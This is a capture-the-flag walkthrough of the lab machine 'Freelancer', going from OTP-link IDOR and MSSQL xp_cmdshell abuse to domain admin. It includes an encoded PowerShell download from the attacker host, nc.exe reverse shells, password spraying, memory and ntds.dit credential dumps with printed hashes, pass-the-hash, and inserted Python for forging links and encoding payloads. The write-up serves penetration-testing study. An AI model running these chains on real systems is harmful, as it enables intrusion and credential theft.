Basic information

Port scan

Port 80 plus the usual Windows/AD ports:

$ nmap -sC -sV 10.10.11.5
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-03 14:06 CST
Nmap scan report for freelancer.htb (10.10.11.5)
Host is up (0.14s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http nginx 1.25.5
|_http-title: Freelancer - Job Board & Hiring platform
|_http-server-header: nginx/1.25.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3269/tcp open tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 4h53m58s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-06-03T11:02:12
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 156.22 seconds

80

A hosts entry is needed:

10.10.11.5 freelancer.htb

A job-hunting / recruiting site:

Directory scan

Directory brute-forcing turns up /admin:

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://freelancer.htb/ --exclude-length 197

/about (Status: 301) [Size: 0] [--> /about/]
/admin (Status: 301) [Size: 0] [--> /admin/]
/contact (Status: 301) [Size: 0] [--> /contact/]

Employer

The site has two registration entry points, but an Employer account is left inactive by default after registration:

recovery

This is a logic flaw in the recovery flow: an inactive account cannot log in, but it can still use "forgot password". After answering the security question chosen at registration and setting a new password, the account is silently activated and can log in normally:

OTP QR-CODE

Next there is a login-by-QR-code feature:

Decoding the QR code gives a link of the following form. The middle base64 segment looks like the user id, and the trailing 32-hex part is the MD5 of the OTP:

http://freelancer.htb/accounts/login/otp/MTAwMTM=/0268a3f41547b64009d5264a068b395c/

echo MTAwMTM= | base64 -d
10013

job

An employer can post jobs. Post a test job and look at its details: the page calls an endpoint that returns employer information by user id:

users

This endpoint has an IDOR. Enumerating ids shows that admin has id 2, and turns up a number of other users:

admin
tomHazard
martin1234
crista.W
Camellia19970
lisa.Ar
SaraArkhader
maya001
ItachiUchiha
Philippos
Jonathon.R
JohntheCarter
Markos

admin

Another logic flaw: the OTP token is not bound to the user id. Replacing just the user-id segment with base64 of 2 while keeping the current token logs us in as admin:

http://freelancer.htb/accounts/login/otp/Mg==/239e3746d021264f38bdd160f52a419c/

Now we can reach /admin, which is the Django admin site:
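To make the flaw concrete, the following added example (not code from the write-up or from the application) parses and forges the link exactly as above, and contrasts the check the write-up observed, token == md5(otp) with the uid ignored, against an assumed server-side fix that binds the token to the uid with an HMAC. The URL layout comes from the page; SERVER_SECRET, the HMAC scheme and the OTP value used in demo() are made up for the illustration.

```python
"""OTP login-link handling: parse, forge (the IDOR), and a uid-bound alternative.

Added example; not code from the original write-up or from the target
application. Only the URL layout /accounts/login/otp/<base64 uid>/<32 hex>/ and
the observation that the trailing part is the MD5 of the OTP come from the
page. The server-side fix (an HMAC that commits to the uid) and SERVER_SECRET
are assumptions used to show what a correctly bound token looks like.
"""
from __future__ import annotations

import base64
import hashlib
import hmac
import re
from urllib.parse import urlsplit

OTP_PATH = re.compile(
    r"^/accounts/login/otp/(?P<uid>[A-Za-z0-9+/=]+)/(?P<token>[0-9a-f]{32})/$"
)
SERVER_SECRET = b"assumed-server-secret"  # hypothetical; a real app loads this from config


def make_otp_link(uid: int, token: str, base: str = "http://freelancer.htb") -> str:
    """Build a link in the layout seen in the QR code: base64(uid), then the token."""
    uid_b64 = base64.b64encode(str(uid).encode()).decode()
    return f"{base}/accounts/login/otp/{uid_b64}/{token}/"


def parse_otp_link(url: str) -> tuple[int, str]:
    """Return (uid, token); raise ValueError for anything that is not an OTP link."""
    m = OTP_PATH.match(urlsplit(url).path)
    if not m:
        raise ValueError(f"not an OTP login link: {url}")
    return int(base64.b64decode(m["uid"]).decode()), m["token"]


def forge_otp_link(url: str, target_uid: int) -> str:
    """The IDOR: keep the token, swap only the uid segment (uid 2 is admin on this box)."""
    _, token = parse_otp_link(url)
    p = urlsplit(url)
    return make_otp_link(target_uid, token, f"{p.scheme}://{p.netloc}")


def verify_unbound(url: str, otp: str) -> bool:
    """The check the write-up observed: token == md5(otp); the uid never enters the comparison."""
    _, token = parse_otp_link(url)
    return hmac.compare_digest(token, hashlib.md5(otp.encode()).hexdigest())


def bound_token(uid: int, otp: str) -> str:
    """Assumed fix: the token commits to the uid via HMAC-SHA256(secret, uid:otp), 32 hex chars."""
    return hmac.new(SERVER_SECRET, f"{uid}:{otp}".encode(), hashlib.sha256).hexdigest()[:32]


def verify_bound(url: str, otp: str) -> bool:
    """Recompute the token for the uid *in the URL*; a swapped uid now fails."""
    uid, token = parse_otp_link(url)
    return hmac.compare_digest(token, bound_token(uid, otp))


def demo(otp: str = "123456", victim_uid: int = 10013, target_uid: int = 2) -> dict[str, bool]:
    """Run both schemes against the same uid-swap (the OTP value is made up for the demo)."""
    weak = make_otp_link(victim_uid, hashlib.md5(otp.encode()).hexdigest())
    strong = make_otp_link(victim_uid, bound_token(victim_uid, otp))
    return {
        "unbound_accepts_own": verify_unbound(weak, otp),
        "unbound_accepts_forged": verify_unbound(forge_otp_link(weak, target_uid), otp),
        "bound_accepts_own": verify_bound(strong, otp),
        "bound_accepts_forged": verify_bound(forge_otp_link(strong, target_uid), otp),
    }


if __name__ == "__main__":
    print(forge_otp_link(
        "http://freelancer.htb/accounts/login/otp/MTAwMTM=/0268a3f41547b64009d5264a068b395c/", 2))
    print(demo())
```

The unbound scheme accepts the forged link because nothing in the comparison depends on the uid; the bound scheme recomputes the expected token from the uid actually present in the URL, so swapping the segment invalidates the token.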

SQL Terminal

There is a SQL Terminal that executes SQL directly against the backend MSSQL instance:

From here it is step-by-step enumeration in SQL: find out which login we are, check whether that login may impersonate anyone, impersonate sa, and enable xp_cmdshell. The EXECUTE AS LOGIN = 'sa' prefix is repeated in every batch so that each one runs in the sa context:

SELECT SYSTEM_USER;
Freelancer_webapp_user

SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';
sa

EXECUTE AS LOGIN = 'sa';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

EXECUTE AS LOGIN = 'sa';EXEC xp_cmdshell whoami;

sql_svc

Then run commands to get a shell. There is AV on the box, but a plain nc.exe reverse shell works. The first line is the download command in clear; the second runs it through xp_cmdshell as a PowerShell -enc payload (base64 of the UTF-16LE command), which avoids nesting quotes inside the single-quoted T-SQL string; the third spawns the reverse shell:

powershell -exec bypass -c 'wget http://10.10.14.10:7777/nc.exe -O C:\windows\Tasks\nc.exe'
EXECUTE AS LOGIN = 'sa';EXEC xp_cmdshell 'powershell -enc cABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwAgAGIAeQBwAGEAcwBzACAALQBjACAAJwB3AGcAZQB0ACAAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADQALgAxADAAOgA3ADcANwA3AC8AbgBjAC4AZQB4AGUAIAAtAE8AIABDADoAXAB3AGkAbgBkAG8AdwBzAFwAVABhAHMAawBzAFwAbgBjAC4AZQB4AGUAJwA=';

EXECUTE AS LOGIN = 'sa';EXEC xp_cmdshell 'C:\windows\Tasks\nc.exe -e powershell.exe 10.10.14.10 4444';
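Why the encoded form: -EncodedCommand takes the base64 of the UTF-16LE command, so the payload contains only base64 characters and can sit inside the T-SQL string literal with no quote escaping at all. It is also what a defender has to undo when xp_cmdshell activity turns up in process-creation logs. The block below is an added example, not code from the write-up: it rebuilds the exact payload above from its clear-text command, wraps it in the impersonated xp_cmdshell batch (adding a REVERT the write-up does not use), and decodes -enc payloads out of constructed, Sysmon-style log lines, also flagging cmd.exe spawned by sqlservr.exe, the process pattern xp_cmdshell leaves behind.

```python
"""Build the encoded xp_cmdshell payload from the write-up, and decode such payloads from logs.

Added example; not code from the original write-up. CMD_FROM_WRITEUP and
ENC_FROM_WRITEUP are the command and its base64 form shown above. SAMPLE_LOG
is constructed for this example in a loose key=value style; it is not a real
log from the box.
"""
from __future__ import annotations

import base64
import re

CMD_FROM_WRITEUP = (
    "powershell -exec bypass -c "
    "'wget http://10.10.14.10:7777/nc.exe -O C:\\windows\\Tasks\\nc.exe'"
)
ENC_FROM_WRITEUP = "cABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwAgAGIAeQBwAGEAcwBzACAALQBjACAAJwB3AGcAZQB0ACAAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADQALgAxADAAOgA3ADcANwA3AC8AbgBjAC4AZQB4AGUAIAAtAE8AIABDADoAXAB3AGkAbgBkAG8AdwBzAFwAVABhAHMAawBzAFwAbgBjAC4AZQB4AGUAJwA="

# -EncodedCommand accepts unique prefixes; these are the spellings seen in practice.
ENC_RE = re.compile(r"-e(?:ncodedcommand|nc|n|c)?\s+([A-Za-z0-9+/]+={0,2})", re.IGNORECASE)
XP_CHILD_RE = re.compile(r"ParentImage=\S*sqlservr\.exe\b.*\bImage=\S*cmd\.exe\b", re.IGNORECASE)

SAMPLE_LOG = "\n".join([  # constructed lines, not real telemetry
    "ParentImage=sqlservr.exe Image=cmd.exe CommandLine=cmd.exe /c powershell -enc " + ENC_FROM_WRITEUP,
    "ParentImage=explorer.exe Image=powershell.exe CommandLine=powershell -exec bypass -File .\\build.ps1",
    "ParentImage=sqlservr.exe Image=cmd.exe CommandLine=cmd.exe /c whoami",
])


def ps_encode(command: str) -> str:
    """base64(UTF-16LE(command)): exactly what powershell -enc expects."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


def ps_decode(blob: str) -> str:
    """Inverse of ps_encode; raises ValueError/UnicodeDecodeError on garbage."""
    return base64.b64decode(blob, validate=True).decode("utf-16le")


def xp_cmdshell_stmt(command: str, login: str = "sa") -> str:
    """T-SQL batch: impersonate `login`, run `command` via xp_cmdshell, drop back with REVERT.

    The encoded payload is pure base64, so the single-quoted T-SQL literal needs no escaping;
    only the login name is escaped, in case it ever contains a quote."""
    login_sql = login.replace("'", "''")
    return (f"EXECUTE AS LOGIN = '{login_sql}'; "
            f"EXEC xp_cmdshell 'powershell -enc {ps_encode(command)}'; REVERT;")


def decode_encoded_commands(log_text: str) -> list[str]:
    """Every -enc payload in the log that decodes to printable ASCII (a cheap plausibility filter)."""
    found = []
    for m in ENC_RE.finditer(log_text):
        try:
            text = ps_decode(m.group(1))
        except (ValueError, UnicodeDecodeError):
            continue
        if text.isascii() and text.isprintable():
            found.append(text)
    return found


def xp_cmdshell_children(log_text: str) -> list[str]:
    """Lines where cmd.exe is spawned by sqlservr.exe: the process pattern xp_cmdshell produces."""
    return [line for line in log_text.splitlines() if XP_CHILD_RE.search(line)]


if __name__ == "__main__":
    print(xp_cmdshell_stmt(CMD_FROM_WRITEUP))
    for cmd in decode_encoded_commands(SAMPLE_LOG):
        print("decoded:", cmd)
    for line in xp_cmdshell_children(SAMPLE_LOG):
        print("sqlservr.exe -> cmd.exe:", line[:80])
```

The decode side deliberately ignores "-exec bypass" (no base64 follows the flag) and only keeps payloads that decode to printable ASCII; a Sigma-style rule would pair the decoded command with the sqlservr.exe parent, since the two together are rarely benign.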

Information

In sql_svc's Downloads directory there is an MSSQL-related folder; a configuration file in it contains some passwords:

SQLSVCPASSWORD="IL0v3ErenY3ager"
SAPWD="t3mp0r@ryS@PWD"

mikasaAckerman & user flag

A quick test shows that mikasaAckerman reuses one of these passwords:

.\RunasCs.exe mikasaAckerman IL0v3ErenY3ager -r 10.10.14.37:4444 powershell

MEMORY.7z

On mikasaAckerman's desktop there is a 7z archive. From the email and the archive name it is clearly a memory dump, so transfer it to the attacking machine for analysis (an impacket SMB share, mounted from the target):

~/Tools/impacket/bin/python3 ~/Tools/impacket/examples/smbserver.py -smb2support miao .  -username miao -password miao

net use v: \\10.10.14.37\miao miao /u:miao

copy MEMORY.7z v:\

After extraction it is a raw memory dump. The standard route is volatility + mimikatz, or windbg + mimikatz (load mimilib, locate the lsass process, switch into its context, run !mimikatz):

.load C:\mimikatz_trunk\x64\mimilib.dll

!process 0 0 lsass.exe
ffffbc83a93e7080
.process /r /p ffffbc83a93e7080
!mimikatz

windbg + mimikatz was flaky here and the output was incomplete; MemProcFS with its plugins does better:

.\MemProcFS.exe -device ..\MEMORY.DMP

dumps

Some of what comes out of the memory dump:

Administrator acb3617b6b9da5dc7778092bdea6f3b8 v3ryS0l!dP@sswd#29
liza.kazanof 6bc05d2a5ebf34f5b563ff233199dc5a
# cracks to RockYou!

PWN3D#l0rr@Armessa19

jmartinez path

Use the password pattern seen in the dump (a fixed base followed by a number) to generate a wordlist and spray it; this finds jmartinez's password. From this user there are several different routes onward:

v3ryS0l!dP@sswd#29

for i in $(seq 1 100); do echo 'v3ryS0l!dP@sswd#'$i; done > passwords.txt

NetExec smb freelancer.htb -u users.txt -p passwords.txt

v3ryS0l!dP@sswd#35

jmartinez is in the Account Operators group, so it can manage other (non-protected) accounts directly.

There is also a service-based privilege escalation route. It requires change-config rights on the VMTools service; note that sc.exe wants a space after binpath=, and that the start will report an error because cmd.exe does not speak the service control protocol, but the command has already run by then:

sc.exe stop VMTools
sc.exe config VMTools binpath= "cmd /c net localgroup administrators jmartinez /add"
sc.exe start VMTools

lorra199 path

The other recovered password contains a mangled form of lorra199's name, and it is indeed that account's password. Log in as lorra199:

evil-winrm -u lorra199 -p 'PWN3D#l0rr@Armessa199' -i freelancer.htb

AD Recycle Bin

lorra199 is in the AD Recycle Bin group; the much older Cascade box had the same element:

liza.kazanof can be restored successfully; then switch to that user with the password recovered from memory earlier (list deleted objects, restore by GUID, then RunasCs):

Get-ADObject -ldapFilter:"(msDS-LastKnownRDN=*)" -IncludeDeletedObjects

Restore-ADObject -Identity "ebe15df5-e265-45ec-b7fc-359877217138" -NewName "Liza Kazanof2" -TargetPath "CN=Users,DC=freelancer,DC=htb"

.\RunasCs.exe liza.kazanof RockYou! -r 10.10.14.37:4444 powershell

liza.kazanof

liza.kazanof has SeBackupPrivilege, so take a volume shadow copy, back up ntds.dit and the SYSTEM hive from it, and dump the hashes:

Follow the steps of the referenced procedure to back up ntds and system, then download them locally and dump:

root flag

Log in with the recovered Administrator hash (pass-the-hash via evil-winrm):

evil-winrm -u Administrator -H 0039318f1e8274633445bce32ad1a290 -i freelancer.htb

hashdump

~/Tools/impacket/bin/python3 ~/Tools/impacket/examples/secretsdump.py -ntds ntds.dit -system system  LOCAL

Administrator:500:aad3b435b51404eeaad3b435b51404ee:0039318f1e8274633445bce32ad1a290:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:89851d57d9c8cc8addb66c59b83a4379:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d238e0bfa17d575038efc070187a91c2:::
freelancer.htb\mikasaAckerman:1105:aad3b435b51404eeaad3b435b51404ee:e8d62c7d57e5d74267ab6feb2f662674:::
sshd:1108:aad3b435b51404eeaad3b435b51404ee:c1e83616271e8e17d69391bdcd335ab4:::
SQLBackupOperator:1112:aad3b435b51404eeaad3b435b51404ee:c4b746db703d1af5575b5c3d69f57bab:::
sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:af7b9d0557964265115d018b5cff6f8a:::
DATACENTER-2019$:1115:aad3b435b51404eeaad3b435b51404ee:7a8b0efef4571ec55cc0b9f8cb73fdcf:::
lorra199:1116:aad3b435b51404eeaad3b435b51404ee:67d4ae78a155aab3d4aa602da518c051:::
freelancer.htb\maya.artmes:1124:aad3b435b51404eeaad3b435b51404ee:22db50a324b9a34ea898a290c1284e25:::
freelancer.htb\michael.williams:1126:aad3b435b51404eeaad3b435b51404ee:af7b9d0557964265115d018b5cff6f8a:::
freelancer.htb\sdavis:1127:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\d.jones:1128:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\jen.brown:1129:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\taylor:1130:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\jmartinez:1131:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\olivia.garcia:1133:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\dthomas:1134:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\sophia.h:1135:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\Ethan.l:1138:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\wwalker:1141:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\jgreen:1142:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\evelyn.adams:1143:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\hking:1144:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\alex.hill:1145:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\samuel.turner:1146:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\ereed:1149:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\leon.sk:1151:aad3b435b51404eeaad3b435b51404ee:af7b9d0557964265115d018b5cff6f8a:::
